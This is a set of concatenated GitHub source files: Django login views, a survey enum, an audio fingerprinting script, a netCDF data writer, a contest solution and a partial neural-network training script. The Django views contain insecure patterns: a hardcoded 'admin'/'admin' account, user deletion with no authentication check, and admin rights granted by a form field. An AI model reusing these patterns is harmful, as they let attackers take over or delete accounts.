render_to_response(template,{},context_instance=RequestContext(request))\n\ndef logout(request):#NOT TESTED\n from django.contrib.auth import logout\n logout(request)\n \n template = 'login/index.html'\n return render_to_response(template,{},context_instance=RequestContext(request))\n\ndef init(request):\n user = Usuario.create_user('admin','admin','admin@admin.gov')\n user.perm = ['admin']\n user.save()\n return redirect('/')\n\ndef index(request):\n if request.user.is_authenticated():\n return redirect('index')\n template = 'login/index.html'\n return render_to_response(template,{},context_instance=RequestContext(request))\n\ndef create(request):\n if not request.user.is_authenticated():\n return redirect('index')\n \n template = 'login/create.html'\n return render_to_response(template,{'usu':Usuario.objects()},context_instance=RequestContext(request))\n\ndef delete_user(request):\n \n usuario = request.POST.get('id_user',False)\n user = Usuario.objects.get(username=usuario)#request.POST['username'])\n user.delete()\n template = 'login/create.html'\n return render_to_response(template,{'usu':Usuario.objects()},context_instance=RequestContext(request))\n\n\n\ndef create_user(request):\n if not request.user.is_authenticated():\n return redirect('index')\n \n usuario = request.POST.get('user',False)\n email = request.POST.get('email',False)\n pswd = request.POST.get('password',False)\n pswd_c = request.POST.get('c_password',False)\n\n import re\n\n if not pswd == pswd_c:\n messages.add_message(request, messages.INFO, 'Contraseñas no coinciden')\n if pswd == '':\n messages.add_message(request, messages.INFO, 'La contraseña no puede ser vacia')\n if usuario == '':\n messages.add_message(request, messages.INFO, 'El usuario no puede ser vacio')\n if email == '':\n messages.add_message(request, messages.INFO, 'El correo no puede ser vacio')\n if not re.match(r\"[^@]+@[^@]+\\.[^@]+\", email):\n messages.add_message(request, messages.INFO, 'El correo no tiene un formato válido')\n\n if len(messages.get_messages(request)) > 0:\n template = 'login/create.html'\n return render_to_response(template,{'usu':Usuario.objects()},context_instance=RequestContext(request))\n user = Usuario.create_user(usuario,pswd,email)\n\n if request.POST.get('archivo',False) is not False:\n user.perm = ['admin']\n user.save()\n\n template = 'login/create.html'\n return render_to_response(template,{'usu':Usuario.objects()},context_instance=RequestContext(request))","repo_name":"drumsoverbogota/metadatos","sub_path":"login/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"7077069674","text":"from enum import Enum\n\nclass PracticeType(Enum):\n pilot = \"Pair Programming being Pilot\",\n copilot = \"Pair Programming being Co-pilot\",\n reviewer = \"Code Review being Reviewer\",\n author = \"Code Review being Author\",\n planning = \"Scrum Planning Meeting\",\n daily = \"Scrum Daily Meeting\",\n review = \"Scrum Review Meeting\",\n retrospective = \"Scrum Retrospective Meeting\",\n design = \"Design Meeting\",\n\nPracticeQuestion = {\n \"pilot\": \" da atividade de programação em pares como piloto.\",\n \"copilot\": \" da atividade de programação em pares como co-piloto.\",\n \"reviewer\": \" da atividade de revisão de código como revisor.\",\n \"author\": \" da atividade de revisão de código como autor.\",\n \"planning\": \" da reunião Planning\",\n \"daily\": \" da reunião Daily\",\n \"review\": \" da reunião Review\",\n \"retrospective\": \" da reunião Retrospective\",\n \"design\": \" de reuniões de discussão de design.\",\n}\nFeelingTranslate = {\n \"confort\": \"Conforto\",\n \"pleasure\": \"Prazer\",\n \"respected\": \"Respeitado\",\n \"safe\": \"Seguro\",\n \"tiring\": \"Cansado\"\n}\n\nFeelingQuestion = {\n \"confort\": \"Sinto confortável ao participar\",\n \"pleasure\": \"Tenho prazer em participar\",\n \"respected\": \"Sinto respeitado pelos meus colegas ao participar\",\n \"safe\": \"Sinto seguro ao participar\",\n \"tiring\": \"Considero cansativo participar\"\n}\n\nexpertiseValue = {\n 1: \"None\",\n 2: \"Small\",\n 3: \"Some\",\n 4: \"High\",\n 5: \"Expert\"\n}\n\nlinkertValue = {\n \"Concordo fortemente\": 7,\n \"Concordo\": 6,\n \"Concordo fracamente\": 5,\n \"Neutro\": 4,\n \"Discordo fracamente\": 3,\n \"Discordo\": 2,\n \"Discordo fortemente\": 1\n}\n\nclass AgilePractice:\n def __init__(self, practiceType, answers):\n self.type = practiceType\n self.answers = answers\n self.expertise = answers[0]\n self.confort = linkertValue[answers[1]]\n self.pleasure = linkertValue[answers[2]]\n self.tiring = linkertValue[answers[3]]\n self.respected = linkertValue[answers[4]]\n self.safe = linkertValue[answers[5]]\n\n def __getitem__(self, key):\n return getattr(self, key)\n \n def __setitem__(self, key, value):\n return setattr(self, key, value)","repo_name":"pri-cavalli/SurveyDataAnalyze","sub_path":"AgilePractice.py","file_name":"AgilePractice.py","file_ext":"py","file_size_in_byte":2234,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"15393858346","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Apr 25 22:27:25 2021\r\n\r\n@author: duwat\r\n\"\"\"\r\n\r\n\r\nimport os\r\nimport warnings\r\nimport librosa\r\nimport numpy as np\r\nfrom scipy import ndimage as ndi\r\nimport random\r\n\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\nfrom functions import get_filename\r\nfrom functions import FingerPrint_Database\r\nfrom functions import peak_local_max\r\nfrom functions import matching_pairs\r\nfrom functions import hashPeaks\r\nfrom functions import best_match\r\nfrom recording import recording\r\n\r\nos.chdir('C:/Users/duwat/Desktop/projet shazam/Album')\r\n# Song database\r\nsong_database = get_filename('C:/Users/duwat/Desktop/projet shazam/Album')\r\n\r\ndef show_database():\r\n print( 'Les musiques contenues dans la database sont :')\r\n index = 1\r\n for i in song_database:\r\n print(index, '- ' + i[:-4])\r\n index = index+1\r\n \r\n return \r\n\r\n\r\nF_database=FingerPrint_Database(song_database)\r\n\r\n\r\ndef shazam(sample):\r\n \r\n print('Shazam tente de retrouver votre titre ...')\r\n \r\n sample_16k = librosa.resample(sample, 44100, 16000)\r\n sample_stft = librosa.stft(sample, n_fft=2048)\r\n sample_stft_dB = librosa.amplitude_to_db(np.abs(sample_stft),ref=np.max) \r\n \r\n threshold = np.amin(sample_stft_dB) * (50/100)\r\n \r\n image_max = ndi.maximum_filter(sample_stft_dB, size=5, mode='constant')\r\n peaks = peak_local_max(sample_stft_dB, min_distance=30,threshold_abs=threshold)\r\n \r\n \r\n # Extract the fingerprint of the unknown audio\r\n sample_fingerprint = hashPeaks(peaks,0)\r\n \r\n \r\n # Find the matching pairs between sample audio file and the songs in the database\r\n matchingPairs = matching_pairs(F_database, sample_fingerprint)\r\n \r\n \r\n # Identify the song\r\n songbins,offsets = best_match(song_database,matchingPairs)\r\n print('Le titre de votre chansion est: '+ song_database[np.argmax(songbins)][:-4], 'une chanson du premier album de The Courthills')\r\n \r\n \r\n\r\n\r\ndef shazam_auto():\r\n \r\n recording()\r\n \r\n sample,sr = librosa.load('Record.wav', sr=44100)\r\n \r\n shazam(sample)\r\n\r\n\r\n\r\n\r\n \r\ndef shazam_manuel(song, bruit, durée , départ):\r\n \r\n x,sr = librosa.load(str(song)+'.wav',sr=44100)\r\n \r\n sam=[]\r\n \r\n r=départ*sr\r\n dur= int(sr*durée)\r\n for i in range (dur):\r\n \r\n b=random.uniform(-bruit, bruit)\r\n sam.append(x[r+i])\r\n \r\n \r\n \r\n y = np.array(sam)\r\n sample = y.astype(np.float)\r\n \r\n sample = 0.99 * sample / max(abs(sample))\r\n shazam(sample)\r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\ndef shazam_manuel_famtom(song, bruit, durée , départ):\r\n \r\n x,sr = librosa.load(str(song)+'.wav',sr=44100)\r\n \r\n sam=[]\r\n print(len(x))\r\n r=départ*sr\r\n dur= int(sr*durée)\r\n for i in range (dur):\r\n \r\n# b=random.uniform(-bruit, bruit)\r\n sam.append(x[r+i])\r\n \r\n \r\n \r\n y = np.array(sam)\r\n sample = y.astype(np.float)\r\n \r\n sample = 0.99 * sample / max(abs(sample))\r\n sample_16k = librosa.resample(sample, 44100, 16000)\r\n sample_stft = librosa.stft(sample, n_fft=2048)\r\n sample_stft_dB = librosa.amplitude_to_db(np.abs(sample_stft),ref=np.max) \r\n \r\n threshold = np.amin(sample_stft_dB) * (50/100)\r\n \r\n image_max = ndi.maximum_filter(sample_stft_dB, size=5, mode='constant')\r\n peaks = peak_local_max(sample_stft_dB, min_distance=30,threshold_abs=threshold)\r\n \r\n \r\n # Extract the fingerprint of the unknown audio\r\n sample_fingerprint = hashPeaks(peaks,0)\r\n \r\n \r\n # Find the matching pairs between sample audio file and the songs in the database\r\n matchingPairs = matching_pairs(F_database, sample_fingerprint)\r\n \r\n \r\n # Identify the song\r\n songbins,offsets = best_match(song_database,matchingPairs)\r\n return song_database[np.argmax(songbins)][:-4]","repo_name":"Mamdad0u/audio_fingerprint","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"15107338373","text":"# L\r\ndef liquid_water_content(meta, mode, nc, ver):\r\n import TData_data as dat\r\n import TData_common as com\r\n import numpy as np\r\n \r\n [ET, DT, DoY] = dat.create_time(meta)\r\n [lat, lon] = dat.create_pos(ET, mode)\r\n \r\n [data_1d, flag_1d, min_dat, max_dat] = dat.create_data_flag(ET)\r\n \r\n # write common global attrib \r\n com.global_attributes(nc, meta, ET, mode)\r\n \r\n # write specific global attrib\r\n nc.product_version = ver\r\n \r\n # write common dimensions\r\n com.dimensions(nc, ET, lat, lon)\r\n \r\n # write specific dimensions\r\n \r\n # write common variables\r\n com.variables(nc, ET, DT, DoY, lat, lon, mode)\r\n \r\n # write specific variables\r\n v = nc.createVariable('cloud_liquid_water_content', np.float32, ('time',), fill_value=-1.00e+20)\r\n #variable attributes\r\n v.units = 'kg m-2'\r\n v.long_name = 'Cloud Liquid Water Content'\r\n v.valid_min = np.float32(min_dat)\r\n v.valid_max = np.float32(max_dat)\r\n v.cell_methods = 'time: mean'\r\n v.coordinates = 'latitude longitude'\r\n #write data\r\n v[:] = np.float32(data_1d) \r\n\r\n v = nc.createVariable('qc_flag', np.int8, ('time',))\r\n #variable attribute\r\n v.units = '1'\r\n v.long_name = 'Data Quality Flag'\r\n v.flag_values = '0b,1b,2b,3b,4b'\r\n v.flag_meanings = 'not_used' + '\\n'\r\n v.flag_meanings = v.flag_meanings + 'good_data' + '\\n'\r\n v.flag_meanings = v.flag_meanings + 'suspect_data_data_not_quality_controlled:_data<0.075' + '\\n'\r\n v.flag_meanings = v.flag_meanings + 'suspect_data_data_not_quality_controlled:_data>0.925' + '\\n'\r\n v.flag_meanings = v.flag_meanings + 'bad_data_do_not_use:_data=0' \r\n #write data\r\n v[:] = np.int8(flag_1d)\r\n \r\n del dat, com, np, data_1d, flag_1d ","repo_name":"barbarabrooks/NCAS-Data-Project-Training-Data","sub_path":"TData_products_L.py","file_name":"TData_products_L.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"41410658718","text":"for T in range(int(input())):\n N, K = map(int, input().split())\n S, numOfSeg, result = input(), N // K, ''\n total0, total1 = S.count('0'), S.count('1')\n if total1 % numOfSeg == 0 and total0 % numOfSeg == 0:\n numZero, numOne = total0 // numOfSeg, total1 // numOfSeg\n for segment in range(numOfSeg):\n if segment % 2 == 0:\n result += ('0' * numZero) + ('1' * numOne)\n else:\n result += ('1' * numOne) + ('0' * numZero)\n else:\n result = 'IMPOSSIBLE'\n print(result)\n\n'''\n2\n8 2\n00011101\n6 2\n100111\n'''\n","repo_name":"alphasingh/competitive-programming","sub_path":"codechef/cookoff/kFoldBinaryString_08_2020.py","file_name":"kFoldBinaryString_08_2020.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"92"} +{"seq_id":"29449388101","text":"import math\nfrom functools import partial\nfrom dataclasses import dataclass\nfrom typing import Optional\nfrom omegaconf import OmegaConf\nimport torch\nfrom torch.nn.modules import activation\nfrom torch.utils.data import DataLoader, random_split\nimport torchvision.transforms as transforms\nimport torchvision.datasets as dsets\nfrom torchvision.datasets import MNIST\nimport torch\nimport torchvision\nfrom torch.utils.data import DataLoader\nimport matplotlib.pyplot as plt\nimport wandb\nimport random\nimport numpy as np\nimport os\nimport itertools\n\ndef reg_softmax(k): \n\n k_copy = k.clone()\n k_flat = k_copy.view(k_copy.size(0), -1)\n k_flat[k_flat == 0] = 1\n shannon_entropy = - torch.sum(((k_flat)) * torch.log(((k_flat))), dim=1)\n # shannon_entropy = shannon_entropy.view(1, -1)\n \n return - shannon_entropy\n\ndef reg_relu(k):\n # print(\"k.shape:\", k.shape)\n k_copy = k.clone()\n k_flat = k_copy.view(k_copy.size(0), -1)\n euclidean_norm = torch.norm(k_flat, dim=1)\n euclidean_norm = euclidean_norm.view(1, -1)\n \n return 0.5 * torch.square(euclidean_norm)\n\ndef reg_tanh(k):\n result_tensor = (k + 1) / 2 * torch.log((k + 1) / 2) + (k - 1) / 2 * torch.log((k - 1) / 2)\n sum_tensor = torch.sum(result_tensor, dim = (1,2,3)) # shape: [batch_size]\n return sum_tensor\n\ndef frobenius_inner_product(k1, k2):\n return torch.sum(k1 * k2, dim = (1,2,3))\n\n# def load_config(conf, show=False):\n# # conf = OmegaConf.from_cli()\n\n# # validate against schema\n# schema = OmegaConf.structured(MNISTConvConfigSchema)\n# conf = OmegaConf.merge(schema, conf)\n\n# if show:\n# print(OmegaConf.to_yaml(conf))\n\n# conf = OmegaConf.to_container(conf)\n\n# return conf\n\ndef get_x_y(batch, cuda):\n # *_, w, h = batch[0].shape\n # images = batch[0].view(-1, w * h) # between [0, 1].\n images = batch[0]\n images = 2*images - 1 # [between -1 and 1]\n labels = batch[1]\n\n if cuda:\n images = images.to(\"cuda\")\n labels = labels.to(\"cuda\")\n\n return images, labels\n\n\nclass ConvUNN(torch.nn.Module):\n\n\n def __init__(self, k, n_classes, activation, dropout_p=0, y_init=\"zero\", seed = 42):\n super().__init__()\n self.k = k\n self.n_classes = n_classes\n self.dropout = torch.nn.Dropout(p=dropout_p)\n self.y_init = y_init\n self.seed = seed\n self.activation = activation\n \n\n # fixed arch. lazy\n\n d0 = 28\n d1 = 6\n n1 = 32\n d2 = 4\n n2 = 64\n d3 = 5\n n3 = n_classes\n\n self.stride = 2\n\n self.n1 = n1\n self.n2 = n2\n self.n3 = n3\n self.d0 = d0\n self.d1 = d1\n self.d2 = d2\n self.d3 = d3\n\n self.h1_dim = (self.d0 - self.d1) // self.stride + 1\n self.h2_dim = (self.h1_dim - self.d2) // self.stride + 1\n\n self.W1 = torch.nn.Parameter(torch.empty(n1, 1, d1, d1))\n self.b1 = torch.nn.Parameter(torch.empty(n1))\n\n self.W2 = torch.nn.Parameter(torch.empty(n2, n1, d2, d2))\n self.b2 = torch.nn.Parameter(torch.empty(n2))\n\n self.W3 = torch.nn.Parameter(torch.empty(n3, n2 * self.h2_dim * self.h2_dim))\n self.b3 = torch.nn.Parameter(torch.empty(n3))\n\n print(\"self.W1\", self.W1.shape)\n print(\"self.b1\", self.b1.shape)\n print(\"self.W2\", self.W2.shape)\n print(\"self.b2\", self.b2.shape)\n print(\"self.W3\", self.W3.shape)\n print(\"self.b3\", self.b3.shape)\n \n torch.manual_seed(self.seed)\n\n torch.nn.init.kaiming_uniform_(self.W1, a=math.sqrt(5))\n # nonlinearity='tanh')\n torch.nn.init.kaiming_uniform_(self.W2, a=math.sqrt(5))\n # nonlinearity='tanh')\n torch.nn.init.kaiming_uniform_(self.W3, a=math.sqrt(5))\n\n fan_in_1, _ = torch.nn.init._calculate_fan_in_and_fan_out(self.W1)\n bound_1 = 1 / math.sqrt(fan_in_1)\n torch.nn.init.uniform_(self.b1, -bound_1, bound_1)\n\n fan_in_2, _ = torch.nn.init._calculate_fan_in_and_fan_out(self.W2)\n bound_2 = 1 / math.sqrt(fan_in_2)\n torch.nn.init.uniform_(self.b2, -bound_2, bound_2)\n\n fan_in_3, _ = torch.nn.init._calculate_fan_in_and_fan_out(self.W3)\n bound_3 = 1 / math.sqrt(fan_in_3)\n torch.nn.init.uniform_(self.b3, -bound_3, bound_3)\n\n\n def _update_X(self, H1):\n return torch.conv_transpose2d(H1, weight=self.W1, stride=self.stride)\n\n def _update_H1(self, X, H2, b1_stochastic):\n\n H1_fwd = torch.conv2d(X, self.W1, self.b1 + b1_stochastic, stride=self.stride)\n H1_bwd = torch.conv_transpose2d(H2, weight=self.W2, stride=self.stride)\n return H1_fwd + H1_bwd\n\n def _update_H2(self, H1, Y, b2_stochastic):\n h1_dim = (self.d0 - self.d1) // self.stride + 1\n h2_dim = (h1_dim - self.d2) // self.stride + 1\n H2_fwd = torch.conv2d(H1, self.W2, self.b2 + b2_stochastic, stride=self.stride)\n H2_bwd = (Y @ self.W3).reshape(-1, self.n2, h2_dim, h2_dim)\n return H2_fwd + H2_bwd\n\n def _update_Y(self, H2, b3_stochastic):\n # flatten\n H2_ = H2.view(H2.shape[0], -1)\n return H2_ @ self.W3.T + (self.b3 + b3_stochastic)\n\n\n def forward(self, X, b1_stochastic, b2_stochastic, b3_stochastic):\n\n h1_dim = (self.d0 - self.d1) // self.stride + 1\n h2_dim = (h1_dim - self.d2) // self.stride + 1\n\n b = X.shape[0]\n H2 = torch.zeros((b, self.n2, h2_dim, h2_dim), device=X.device)\n \n # Initialize Y according to setup\n if self.y_init == \"zero\":\n # Initialize Y with zeros by default\n Y = torch.zeros(b, self.n3, device=X.device) \n elif self.y_init == \"rand\":\n # Initialize Y as a random probability distribution\n Y = torch.rand(b, self.n3, device=X.device) \n Y = torch.softmax(Y, dim=-1)\n elif self.y_init == \"uniform\":\n # Initialize Y as a random probability distribution\n Y = torch.zeros(b, self.n3, device=X.device) \n Y = torch.softmax(Y, dim=-1)\n\n mask_H1 = torch.ones(b, self.n1, h1_dim, h1_dim, device=X.device)\n mask_H1 = self.dropout(mask_H1)\n\n mask_H2 = torch.ones(b, self.n2, h2_dim, h2_dim, device=X.device)\n mask_H2 = self.dropout(mask_H2)\n \n total_energy = []\n total_energy = []\n total_entropy = []\n \n for i in range(self.k):\n if i==0: # Standard training of UNN with k steps of coordinate descent\n # for _ in range(self.k):\n\n X_flattened = torch.flatten(X, 1, 3)\n \n if torch.cuda.is_available(): \n device = torch.device(\"cuda\")\n X_flattened = X_flattened.to(device)\n X = X.to(device)\n Y = Y.to(device)\n b1_stochastic = b1_stochastic.to(device)\n H2 = H2.to(device)\n else:\n device = torch.device(\"cpu\")\n X_flattened = X_flattened.to(device)\n X = X.to(device)\n Y = Y.to(device)\n b1_stochastic = b1_stochastic.to(device)\n H2 = H2.to(device)\n\n\n H1 = self._update_H1(X, H2, b1_stochastic)\n \n if self.activation == \"relu\":\n H1 = torch.relu(H1)\n elif self.activation == \"tanh\":\n H1 = torch.tanh(H1)\n \n if torch.cuda.is_available():\n device = torch.device(\"cuda\")\n mask_H1 = mask_H1.to(device)\n b2_stochastic = b2_stochastic.to(device)\n H1 = H1.to(device)\n else:\n device = torch.device(\"cpu\")\n mask_H1 = mask_H1.to(device)\n b2_stochastic = b2_stochastic.to(device)\n H1 = H1.to(device)\n\n H1 = H1 * mask_H1\n\n H2 = self._update_H2(H1, Y, b2_stochastic)\n\n if self.activation == \"relu\":\n H2 = torch.relu(H2)\n elif self.activation == \"tanh\":\n H2 = torch.tanh(H2)\n \n \n if torch.cuda.is_available():\n device = torch.device(\"cuda\")\n mask_H2 = mask_H2.to(device)\n b3_stochastic = b3_stochastic.to(device)\n H2 = H2.to(device)\n else:\n device = torch.device(\"cpu\")\n mask_H2 = mask_H2.to(device)\n b3_stochastic = b3_stochastic.to(device)\n H2 = H2.to(device)\n\n H2 = H2 * mask_H2\n\n Y_logits = self._update_Y(H2, b3_stochastic)\n Y = torch.softmax(Y_logits, dim=-1)\n \n H2 = self._update_H2(H1, Y, b2_stochastic)\n\n if self.activation == \"relu\":\n H2 = torch.relu(H2)\n elif self.activation == \"tanh\":\n H2 = torch.tanh(H2)\n \n H2 = H2 * mask_H2\n entropy = reg_softmax(Y)\n total_entropy.append(-torch.sum(entropy))\n ###### Energy Calculation´######\n\n E_X = 0.5 * (frobenius_inner_product(X, X)) #Parece ok\n if self.activation == \"relu\":\n # print(\"entrei relu\")\n E_H1 = - torch.sum((((self.b1 + b1_stochastic).view(32, 1,1) * torch.ones((12,12), device = \"cuda:0\")).view(1, 32, 12, 12)*H1),dim = (1,2,3)) + reg_relu(H1)\n E_H2 = - torch.sum((((self.b2 + b2_stochastic).view(64, 1,1) * torch.ones((5,5), device = \"cuda:0\")).view(1, 64, 5, 5)*H2),dim = (1,2,3)) + reg_relu(H2)\n elif self.activation == \"tanh\":\n # print(\"entrei tanh\")\n E_H1 = - torch.sum((((self.b1 + b1_stochastic).view(32, 1,1) * torch.ones((12,12), device = \"cuda:0\")).view(1, 32, 12, 12)*H1),dim = (1,2,3)) + 0.5 * (frobenius_inner_product(X, X))\n E_H2 = - torch.sum((((self.b2 + b2_stochastic).view(64, 1,1) * torch.ones((5,5), device = \"cuda:0\")).view(1, 64, 5, 5)*H2),dim = (1,2,3)) + 0.5 * (frobenius_inner_product(X, X))\n\n E_Y = - torch.sum(Y * (self.b3 + b3_stochastic).view(1, 10), dim=1) + reg_softmax(Y)\n\n E_XH1 = - torch.sum(torch.conv2d(X, self.W1, stride=self.stride) * H1, dim=(1, 2, 3))\n E_H1H2 = - torch.sum(torch.conv2d(H1, self.W2, stride=self.stride) * H2, dim=(1, 2, 3))\n\n energy = E_X + E_H1 + E_H2 + E_Y + E_XH1 + E_H1H2\n total_energy.append(torch.mean(energy).item())\n \n # print(\"b1_stochastic.shape:\",b1_stochastic.shape)\n # print(\"b2_stochastic.shape:\",b2_stochastic.shape)\n # print(\"b3_stochastic.shape:\",b3_stochastic.shape)\n\n # print(\"self.b1.shape:\",self.b1.shape)\n # print(\"self.b2.shape:\",self.b2.shape)\n # print(\"self.b3.shape:\",self.b3.shape)\n\n # print(\"E_X.shape:\",E_X.shape)\n # print(\"E_H1.shape:\",E_H1.shape)\n # print(\"E_H2.shape:\",E_H2.shape)\n # print(\"E_Y.shape:\",E_Y.shape)\n # print(\"E_XH1.shape:\",E_XH1.shape)\n # print(\"E_H1H2.shape:\",E_H1H2.shape)\n\n # print(\"torch.conv2d(X, self.W1, stride=self.stride).shape:\",torch.conv2d(X, self.W1, stride=self.stride).shape)\n # print(\"H1.shape:\",H1.shape)\n # print(\"torch.sum(conv_result * H1, dim=(1, 2, 3)):\",torch.sum(torch.conv2d(X, self.W1, stride=self.stride) * H1, dim=(1, 2, 3)).shape) \n \n # print(total_energy) \n return Y_logits, total_energy, total_entropy\n\n def backward(self, y, b1_stochastic, b2_stochastic, k=None, return_all_x=True):\n\n if k is None:\n k = self.k\n\n Y = torch.nn.functional.one_hot(y, num_classes=self.n_classes)\n b = Y.shape[0]\n\n all_X = []\n\n H1 = torch.zeros(b, self.n1, self.h1_dim, self.h1_dim, device=y.device)\n\n X = torch.zeros(b, 1, self.d0, self.d0, device=y.device)\n # X = torch.flatten(X, 1, 3)\n Y = Y.to(dtype=X.dtype)\n\n for i in range(k):\n H2 = self._update_H2(H1, Y, b2_stochastic)\n\n if self.activation == \"relu\":\n H2 = torch.relu(H2)\n elif self.activation == \"tanh\":\n H2 = torch.tanh(H2)\n\n H1 = self._update_H1(X, H2, b1_stochastic)\n \n if self.activation == \"relu\":\n H1 = torch.relu(H1)\n elif self.activation == \"tanh\":\n H1 = torch.tanh(H1)\n\n Xp = self._update_X(H1)\n if self.activation == \"relu\":\n X = torch.relu(Xp)\n elif self.activation == \"tanh\":\n X = torch.tanh(Xp)\n\n if return_all_x:\n all_X.append(X.detach().clone())\n\n H1 = self._update_H1(X, H2, b1_stochastic)\n \n if self.activation == \"relu\":\n H1 = torch.relu(H1)\n elif self.activation == \"tanh\":\n H1 = torch.tanh(H1)\n \n # if self.k > 1:\n # X = torch.flatten(X, 1, 3)\n\n # returns pre-activation (logit) X as well as matrix of all Xs.\n return Xp, all_X\n\ndef main():\n \n run = wandb.init()\n conf = run.config\n\n backward_loss_coef = conf.backward_loss_coef\n batch_size = conf.batch_size\n device = conf.device\n dropout = conf.dropout\n lr = conf.lr\n max_epochs = conf.max_epochs\n noise_mean = conf.noise_mean\n noise_sd = conf.noise_sd\n seed = conf.seed\n unn_iter = conf.unn_iter\n unn_y_init = conf.unn_y_init\n activation = conf.activation\n \n \n if torch.cuda.is_available():\n device = \"cuda\"\n\n # print(\"config.dropout:\",config.dropout)\n\n # conf = load_config(conf, show=True)\n \n # Step 1. Load Dataset\n train_and_dev_dataset = dsets.MNIST(root='data', train=True, transform=transforms.ToTensor(), download=True)\n test_dataset = dsets.MNIST(root='data', train=False, transform=transforms.ToTensor())\n\n n_train_and_dev = len(train_and_dev_dataset)\n n_dev = 10000\n train_dataset, dev_dataset = random_split(\n train_and_dev_dataset,\n [n_train_and_dev - n_dev, n_dev],\n generator=torch.Generator().manual_seed(42)\n )\n\n print(\"Train data\", len(train_dataset))\n print(\"Dev data\", len(dev_dataset))\n print(\"Test data\", len(test_dataset))\n\n print(\"CONF:\",conf)\n batch_size = conf['batch_size']\n _, w, h = train_dataset[0][0].shape\n input_dim = w * h\n output_dim = 10\n\n train_loader = DataLoader(dataset=train_dataset, batch_size=batch_size, shuffle=True)\n dev_loader = DataLoader(dataset=dev_dataset, batch_size=batch_size, shuffle=False)\n test_loader = DataLoader(dataset=test_dataset, batch_size=batch_size, shuffle=False)\n\n model = ConvUNN(k=conf['unn_iter'],\n n_classes=output_dim,\n dropout_p=conf['dropout'],\n y_init=conf['unn_y_init'],\t\n seed = conf[\"seed\"],\n activation = conf[\"activation\"]\n )\n\n if torch.cuda.is_available():\n model = model.to(\"cuda\")\n\n print(model)\n\n # optimizer = torch.optim.SGD(model.parameters(), lr=conf['lr'], momentum = 0.9)\n optimizer = torch.optim.Adam(model.parameters(), lr=conf['lr'])\n\n\n print('Num parameters:', sum(p.numel() for p in model.parameters()))\n\n # for p in model.parameters():\n # print(p.numel())\n\n for name, param in model.named_parameters():\n print(name, param.numel())\n \n noise_sd = conf[\"noise_sd\"]\n noise_mean = conf[\"noise_mean\"]\n \n train_model(model,\n train_loader,\n dev_loader,\n test_loader,\n optimizer,\n conf,\n get_x_y,\n noise_sd,\n noise_mean)\n\n run.finish()\n\n\ndef train_model(model, train_loader, dev_loader, test_loader,\n optimizer, conf, get_x_y, noise_sd, noise_mean):\n\n n_train = len(train_loader.dataset)\n\n best_val_acc = 0\n best_val_acc_test_acc = None\n best_val_acc_epoch = None\n\n # accuracy_dev = eval_model(model, dev_loader, get_x_y)\n # accuracy_test = eval_model(model, test_loader, get_x_y)\n # print(\"Before training acc\", accuracy_dev, accuracy_test)\n\n # computes softmax and then the cross entropy\n loss_fw = torch.nn.CrossEntropyLoss(reduction='none')\n loss_bw = torch.nn.BCEWithLogitsLoss(reduction='none')\n \n epochs_list = []\n loss_fw_train_list = []\n loss_bw_train_list = []\n loss_fw_val_list = []\n loss_bw_val_list = []\n loss_fw_test_list = []\n loss_bw_test_list = []\n acc_train_list = []\n acc_val_list = []\n acc_test_list = []\n noise_seeds_list = []\n\n params_shape_list = []\n for p in model.parameters():\n print(p.numel())\n params_shape_list.append(p.numel())\n\n W1_shape, b1_shape, W2_shape, b2_shape, W3_shape, b3_shape = params_shape_list\n \n fw_increases = 0\n bw_increases = 0\n \n lowest_loss_fw_val = +np.inf\n lowest_loss_bw_val = +np.inf\n\n for epoch in range(conf['max_epochs']):\n\n # generate noise and keep track\n \n # random_int = torch.randint(low=1, high=101, size=(1,)).item()\n random_int = random.randint(1, 100)\n torch.manual_seed(random_int)\n b1_stochastic = torch.randn(b1_shape)*noise_sd + noise_mean\n b2_stochastic = torch.randn(b2_shape)*noise_sd + noise_mean\n b3_stochastic = torch.randn(b3_shape)*noise_sd + noise_mean\n\n if torch.cuda.is_available():\n b1_stochastic = b1_stochastic.to(\"cuda\")\n b2_stochastic = b2_stochastic.to(\"cuda\")\n b3_stochastic = b3_stochastic.to(\"cuda\")\n\n noise_seeds_list.append(random_int)\n\n loss_fw_train = 0\n loss_bw_train = 0\n accuracy_train = 0\n\n loss_fw_val_total = 0 \n loss_bw_val_total = 0 \n\n for batch_id, batch in enumerate(train_loader):\n model.train()\n optimizer.zero_grad()\n\n if torch.cuda.is_available():\n cuda = torch.cuda.is_available()\n else:\n cuda = False\n\n x, y = get_x_y(batch, cuda)\n\n # [batch x n_classes]\n logits_fw, _, _aaa = model(x, b1_stochastic, b2_stochastic, b3_stochastic)\n # [batch]\n loss_val_fw = loss_fw(logits_fw, y)\n\n loss_avg = loss_val_fw.mean()\n if conf['backward_loss_coef'] > 0:\n\n # [batch x 1 x 28 x 28]\n logits_bw, _ = model.backward(y, b1_stochastic, b2_stochastic)\n # [batch x 1 x 28 x 28]\n loss_val_bw = loss_bw(logits_bw, (x>0).to(dtype=x.dtype))\n\n loss_avg = loss_avg + conf['backward_loss_coef'] * loss_val_bw.mean()\n\n loss_avg.backward()\n optimizer.step()\n\n loss_fw_train += loss_val_fw.sum().item()\n if conf['backward_loss_coef'] > 0:\n loss_bw_train += loss_val_bw.mean(dim=-1).sum().item()\n accuracy_train += (logits_fw.argmax(dim=1) == y).sum().item()\n\n accuracy_val, loss_fw_val, loss_bw_val = eval_model(model, dev_loader, get_x_y, loss_fw, loss_bw, b1_stochastic, b2_stochastic, b3_stochastic, cuda)\n accuracy_test, loss_fw_test, loss_bw_test = eval_model(model, test_loader, get_x_y, loss_fw, loss_bw, b1_stochastic, b2_stochastic, b3_stochastic, cuda)\n\n loss_val_avg = loss_fw_val + conf[\"backward_loss_coef\"]*loss_bw_val\n\n loss_fw_train /= n_train # average sample loss\n loss_bw_train /= n_train # average sample loss\n 